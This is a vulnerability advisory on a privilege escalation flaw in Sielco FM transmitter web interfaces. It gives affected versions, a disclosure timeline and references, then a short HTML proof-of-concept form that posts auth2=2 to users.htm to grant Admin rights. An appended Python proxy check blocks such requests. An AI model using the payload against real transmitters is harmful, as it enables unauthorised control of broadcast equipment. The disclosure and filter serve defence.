zeroscience | Gjoko Krstic | ZSL-2023-5755
Mar 28, 2023 - 12:00 a.m.

Sielco Analog FM Transmitter 2.12 Remote Privilege Escalation


CVSS3: 8.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score: 9 High (Confidence: High)
EPSS: 0.001 Low (Percentile: 19.3%)

Title: Sielco Analog FM Transmitter 2.12 Remote Privilege Escalation
Advisory ID: ZSL-2023-5755
Type: Local/Remote
Impact: Privilege Escalation
Risk: (4/5)
Release Date: 28.03.2023

Summary

Sielco designs and produces FM radio transmitters for professional broadcasting. The in-house laboratory develops standard and customised solutions to meet all needs. Whether digital or analogue, each product is studied to ensure reliability, resistance over time and a high standard of safety. Sielco transmitters are distributed throughout the world and serve many radios in Europe, South America, Africa, Oceania and China.

Description

The application suffers from a privilege escalation vulnerability. A user with Read permissions can elevate his/her privileges by sending an HTTP POST request that sets the parameter ‘auth1’, ‘auth2’ or ‘auth3’ to the integer value ‘1’ for Write or ‘2’ for Admin permissions.

Vendor

Sielco S.r.l - <https://www.sielco.org>

Affected Version

2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)

Tested On

lwIP/2.1.1
Web/3.0.3

Vendor Status

[26.01.2023] Vulnerability discovered.
[27.01.2023] Contact with the vendor and CSIRT Italia.
[27.03.2023] No response from the vendor.
[27.03.2023] No response from the CSIRT team.
[28.03.2023] Public security advisory released.

PoC

sielco_fm_eop.html

Credits

Vulnerability discovered by Gjoko Krstic

References

[1] <https://www.exploit-db.com/exploits/51366>
[2] <https://packetstormsecurity.com/files/171842/>
[3] <https://cxsecurity.com/issue/WLB-2023040059>
[4] <https://www.cisa.gov/news-events/ics-advisories/icsa-23-299-08>
[5] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-41966>
[6] <https://nvd.nist.gov/vuln/detail/CVE-2023-41966>
[7] <https://exchange.xforce.ibmcloud.com/vulnerabilities/253074>
[8] <https://exchange.xforce.ibmcloud.com/vulnerabilities/269709>

Changelog

[28.03.2023] - Initial release
[02.11.2023] - Added reference [1], [2], [3], [4], [5], [6], [7] and [8]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>

<!--

Sielco Analog FM Transmitter 2.12 Remote Privilege Escalation


Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
                  2.12 (EXC120GX)
                  2.11 (EXC300GX)
                  2.10 (EXC1600GX)
                  2.10 (EXC2000GX)
                  2.08 (EXC1600GX)
                  2.08 (EXC1000GX)
                  2.07 (EXC3000GX)
                  2.06 (EXC5000GX)
                  1.7.7 (EXC30GT)
                  1.7.4 (EXC300GT)
                  1.7.4 (EXC100GT)
                  1.7.4 (EXC5000GT)
                  1.6.3 (EXC1000GT)
                  1.5.4 (EXC120GT)

Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.

Desc: The application suffers from a privilege escalation vulnerability.
A user with Read permissions can elevate his/her privileges by sending
an HTTP POST request setting the parameter 'auth1' or 'auth2' or 'auth3'
to integer value '1' for Write or '2' for Admin permissions.

Tested on: lwIP/2.1.1
           Web/3.0.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5755
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5755.php


26.01.2023

--><html>
<body>
<form action="http://transmitter/protect/users.htm" method="POST">
<input name="pwd0" type="hidden" value=""/>
<input name="pwd0bis" type="hidden" value=""/>
<input name="user1" type="hidden" value=""/>
<input name="pwd1" type="hidden" value=""/>
<input name="pwd1bis" type="hidden" value=""/>
<input name="auth1" type="hidden" value=""/>
<input name="user2" type="hidden" value="test"/>
<input name="pwd2" type="hidden" value=""/>
<input name="pwd2bis" type="hidden" value=""/>
<input name="auth2" type="hidden" value="2"/>
<input name="user3" type="hidden" value=""/>
<input name="pwd3" type="hidden" value=""/>
<input name="pwd3bis" type="hidden" value=""/>
<input name="auth3" type="hidden" value=""/>
<input type="submit" value="Escalate"/>
</form>
</body>
</html>
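
The server-side check whose absence the description points to, written as a gate that a filtering proxy in front of the device could apply to each request. This is an added example, not code from the advisory or the vendor. It assumes the proxy holds its own record of the caller's permission level and that Read is encoded as 0; `check_request` and the sample body are constructed for illustration.

```python
from urllib.parse import parse_qs

# Levels 1 (Write) and 2 (Admin) are from the advisory; 0 for Read is assumed.
READ, WRITE, ADMIN = 0, 1, 2
USERS_PATH = "/protect/users.htm"          # endpoint the PoC form posts to
AUTH_FIELDS = ("auth1", "auth2", "auth3")  # per-slot permission parameters

# Constructed sample body with the same fields the PoC form submits for slot 2.
SAMPLE_BODY = "user2=test&pwd2=&pwd2bis=&auth1=&auth2=2&auth3="


def check_request(method, path, body, caller_level):
    """Return (allowed, reasons) for one request seen by a filtering proxy.

    caller_level is the level the proxy itself holds for the authenticated
    caller (hypothetical lookup); nothing in the request body is trusted.
    """
    if method.upper() != "POST" or path.split("?", 1)[0] != USERS_PATH:
        return True, []
    form = parse_qs(body, keep_blank_values=True)
    reasons = []
    for field in AUTH_FIELDS:
        values = form.get(field, [])
        if len(values) > 1:
            # Duplicates let proxy and device disagree on which value wins.
            reasons.append(f"{field}: repeated parameter")
            continue
        for raw in values:
            if raw == "":
                continue  # empty field carries no permission level
            if raw not in ("0", "1", "2"):
                reasons.append(f"{field}: unexpected value {raw!r}")
            elif caller_level < ADMIN:
                reasons.append(f"{field}={raw} set by non-admin caller")
    return not reasons, reasons


if __name__ == "__main__":
    for name, level in (("read-only", READ), ("admin", ADMIN)):
        allowed, why = check_request("POST", USERS_PATH, SAMPLE_BODY, level)
        print(name, "forward" if allowed else "block", why)
```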
